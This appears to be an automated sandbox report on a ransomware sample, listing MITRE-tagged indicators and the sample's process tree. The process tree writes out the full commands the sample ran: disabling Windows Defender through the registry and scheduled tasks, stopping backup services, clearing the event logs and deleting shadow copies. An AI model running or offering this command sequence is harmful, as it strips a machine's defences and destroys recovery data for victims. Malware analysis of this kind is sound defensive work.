File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-36_altform-unplated.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16_altform-lightunplated.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\PGOMESSAGES.XML.sn4-TxbqI9zbrTY2fZr0i-4iq2NbmIe_KKsVdn4ivmwtyC9nWLl0FmQZNoFLFD0t.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe

Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3968 sc.exe
2120 sc.exe
3460 sc.exe
4164 sc.exe
3224 sc.exe
3584 sc.exe
1376 sc.exe
5052 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3968	sc.exe
2120	sc.exe
3460	sc.exe
4164	sc.exe
3224	sc.exe
3584	sc.exe
1376	sc.exe
5052	sc.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

Processes:

firefox.exemsedge.exetor-browser-windows-x86_64-portable-13.0.10.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-399997616-3400990511-967324271-1000\{7D222204-70E0-4E43-A897-3964690D9CD4}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	tor-browser-windows-x86_64-portable-13.0.10.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 821460.crdownload:SmartScreen msedge.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

4200 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2988 PING.EXE

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 821460.crdownload:SmartScreen	msedge.exe

pid	process
4200	notepad.exe

pid	process
2988	PING.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exepowershell.exewindows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exe

pid	process
4412	powershell.exe
4412	powershell.exe
3832	powershell.exe
3832	powershell.exe
2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
4400	msedge.exe
4400	msedge.exe
2460	msedge.exe
2460	msedge.exe
688	identity_helper.exe
688	identity_helper.exe
3040	msedge.exe
3040	msedge.exe
4812	msedge.exe
4812	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

tor-browser-windows-x86_64-portable-13.0.10.exe

pid process

4960 tor-browser-windows-x86_64-portable-13.0.10.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

Processes:

msedge.exe

pid	process
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	4296	wevtutil.exe
Token: SeBackupPrivilege	4296	wevtutil.exe
Token: SeSecurityPrivilege	4364	wevtutil.exe
Token: SeBackupPrivilege	4364	wevtutil.exe
Token: SeSecurityPrivilege	4652	wevtutil.exe
Token: SeBackupPrivilege	4652	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	3272	wmic.exe
Token: SeSecurityPrivilege	3272	wmic.exe
Token: SeTakeOwnershipPrivilege	3272	wmic.exe
Token: SeLoadDriverPrivilege	3272	wmic.exe
Token: SeSystemProfilePrivilege	3272	wmic.exe
Token: SeSystemtimePrivilege	3272	wmic.exe
Token: SeProfSingleProcessPrivilege	3272	wmic.exe
Token: SeIncBasePriorityPrivilege	3272	wmic.exe
Token: SeCreatePagefilePrivilege	3272	wmic.exe
Token: SeBackupPrivilege	3272	wmic.exe
Token: SeRestorePrivilege	3272	wmic.exe
Token: SeShutdownPrivilege	3272	wmic.exe
Token: SeDebugPrivilege	3272	wmic.exe
Token: SeSystemEnvironmentPrivilege	3272	wmic.exe
Token: SeRemoteShutdownPrivilege	3272	wmic.exe
Token: SeUndockPrivilege	3272	wmic.exe
Token: SeManageVolumePrivilege	3272	wmic.exe
Token: 33	3272	wmic.exe
Token: 34	3272	wmic.exe
Token: 35	3272	wmic.exe
Token: 36	3272	wmic.exe
Token: SeIncreaseQuotaPrivilege	3580	wmic.exe
Token: SeSecurityPrivilege	3580	wmic.exe
Token: SeTakeOwnershipPrivilege	3580	wmic.exe
Token: SeLoadDriverPrivilege	3580	wmic.exe
Token: SeSystemProfilePrivilege	3580	wmic.exe
Token: SeSystemtimePrivilege	3580	wmic.exe
Token: SeProfSingleProcessPrivilege	3580	wmic.exe
Token: SeIncBasePriorityPrivilege	3580	wmic.exe
Token: SeCreatePagefilePrivilege	3580	wmic.exe
Token: SeBackupPrivilege	3580	wmic.exe
Token: SeRestorePrivilege	3580	wmic.exe
Token: SeShutdownPrivilege	3580	wmic.exe
Token: SeDebugPrivilege	3580	wmic.exe
Token: SeSystemEnvironmentPrivilege	3580	wmic.exe
Token: SeRemoteShutdownPrivilege	3580	wmic.exe
Token: SeUndockPrivilege	3580	wmic.exe
Token: SeManageVolumePrivilege	3580	wmic.exe
Token: 33	3580	wmic.exe
Token: 34	3580	wmic.exe
Token: 35	3580	wmic.exe
Token: 36	3580	wmic.exe
Token: SeIncreaseQuotaPrivilege	3580	wmic.exe
Token: SeSecurityPrivilege	3580	wmic.exe
Token: SeTakeOwnershipPrivilege	3580	wmic.exe
Token: SeLoadDriverPrivilege	3580	wmic.exe
Token: SeSystemProfilePrivilege	3580	wmic.exe
Token: SeSystemtimePrivilege	3580	wmic.exe
Token: SeProfSingleProcessPrivilege	3580	wmic.exe
Token: SeIncBasePriorityPrivilege	3580	wmic.exe
Token: SeCreatePagefilePrivilege	3580	wmic.exe
Token: SeBackupPrivilege	3580	wmic.exe
Token: SeRestorePrivilege	3580	wmic.exe
Token: SeShutdownPrivilege	3580	wmic.exe
Token: SeDebugPrivilege	3580	wmic.exe
Token: SeSystemEnvironmentPrivilege	3580	wmic.exe
Token: SeRemoteShutdownPrivilege	3580	wmic.exe
Token: SeUndockPrivilege	3580	wmic.exe

Suspicious use of FindShellTrayWindow 63 IoCs

Processes:

msedge.exefirefox.exe

pid	process
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2544	firefox.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe
2460	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

firefox.exe

pid process

2544 firefox.exe
2544 firefox.exe
2544 firefox.exe
2544 firefox.exe

pid	process
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe
2544	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2784 wrote to memory of 1336	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 1336	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 1336	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 1336 wrote to memory of 640	1336	net.exe	net1.exe
PID 1336 wrote to memory of 640	1336	net.exe	net1.exe
PID 1336 wrote to memory of 640	1336	net.exe	net1.exe
PID 2784 wrote to memory of 2092	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 2092	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 2092	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2092 wrote to memory of 1992	2092	net.exe	net1.exe
PID 2092 wrote to memory of 1992	2092	net.exe	net1.exe
PID 2092 wrote to memory of 1992	2092	net.exe	net1.exe
PID 2784 wrote to memory of 4904	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 4904	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 4904	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 4904 wrote to memory of 3832	4904	net.exe	net1.exe
PID 4904 wrote to memory of 3832	4904	net.exe	net1.exe
PID 4904 wrote to memory of 3832	4904	net.exe	net1.exe
PID 2784 wrote to memory of 1264	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 1264	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 1264	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 1264 wrote to memory of 1396	1264	net.exe	net1.exe
PID 1264 wrote to memory of 1396	1264	net.exe	net1.exe
PID 1264 wrote to memory of 1396	1264	net.exe	net1.exe
PID 2784 wrote to memory of 2060	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 2060	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 2060	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2060 wrote to memory of 2520	2060	net.exe	net1.exe
PID 2060 wrote to memory of 2520	2060	net.exe	net1.exe
PID 2060 wrote to memory of 2520	2060	net.exe	net1.exe
PID 2784 wrote to memory of 3644	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 3644	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 3644	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 3644 wrote to memory of 2012	3644	net.exe	net1.exe
PID 3644 wrote to memory of 2012	3644	net.exe	net1.exe
PID 3644 wrote to memory of 2012	3644	net.exe	net1.exe
PID 2784 wrote to memory of 812	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 812	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 812	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 812 wrote to memory of 1724	812	net.exe	net1.exe
PID 812 wrote to memory of 1724	812	net.exe	net1.exe
PID 812 wrote to memory of 1724	812	net.exe	net1.exe
PID 2784 wrote to memory of 968	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 968	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 2784 wrote to memory of 968	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	net.exe
PID 968 wrote to memory of 3020	968	net.exe	net1.exe
PID 968 wrote to memory of 3020	968	net.exe	net1.exe
PID 968 wrote to memory of 3020	968	net.exe	net1.exe
PID 2784 wrote to memory of 3968	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3968	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3968	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 2120	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 2120	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 2120	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3460	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3460	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3460	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 4164	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 4164	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 4164	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3224	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3224	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3224	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe
PID 2784 wrote to memory of 3584	2784	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
"C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2784

C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
3⤵
PID:640

C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
3⤵
PID:1992

C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
3⤵
PID:3832

C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
3⤵
PID:1396

C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
3⤵
PID:2520

C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
3⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
3⤵
PID:1724

C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_2db38" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_2db38" /y
3⤵
PID:3020

C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
- Launches sc.exe
PID:3968

C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
- Launches sc.exe
PID:2120

C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
- Launches sc.exe
PID:3460

C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
- Launches sc.exe
PID:4164

C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
2⤵
- Launches sc.exe
PID:3224

C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
- Launches sc.exe
PID:3584

C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
- Launches sc.exe
PID:1376

C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_2db38" start= disabled
2⤵
- Launches sc.exe
PID:5052

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4284

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
PID:844

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:624

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2472

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3740

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1972

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:688

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:920

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:2196

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:4952

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:5072

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:1976

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:4900

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:3724

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:3252

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:2056

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:4812

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:3244

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:4272

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:888

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:3160

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:4240

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1940

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:396

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2108

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
- Modifies security service
PID:2568

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3180

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:2484

